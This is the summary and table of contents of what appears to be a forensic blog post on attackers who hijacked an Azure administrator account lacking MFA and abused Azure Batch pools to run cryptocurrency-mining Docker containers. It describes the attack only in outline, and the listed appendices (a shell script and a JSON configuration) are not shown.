Attackers compromised an Azure administrator account without MFA to exploit Azure Batch for cryptocurrency mining. They created batch accounts, requested quota increases through Microsoft support, and deployed Ubuntu pools with malicious start tasks that downloaded scripts from GitHub. These scripts installed Docker and ran mining containers, demonstrating how cloud compute resources can be abused for cryptojacking. The post provides detailed forensic analysis of Azure logs, attacker techniques, and the malicious Docker container configuration used for mining operations.
Table of contents
IntroductionBackgroundAttacker’s actionConclusionAppendix A - ba.shAppendix B - 00ca23e288f0686e5721b097f9617e2a05ad84508e84f0c27dee2c97261ae0a1.jsonSort: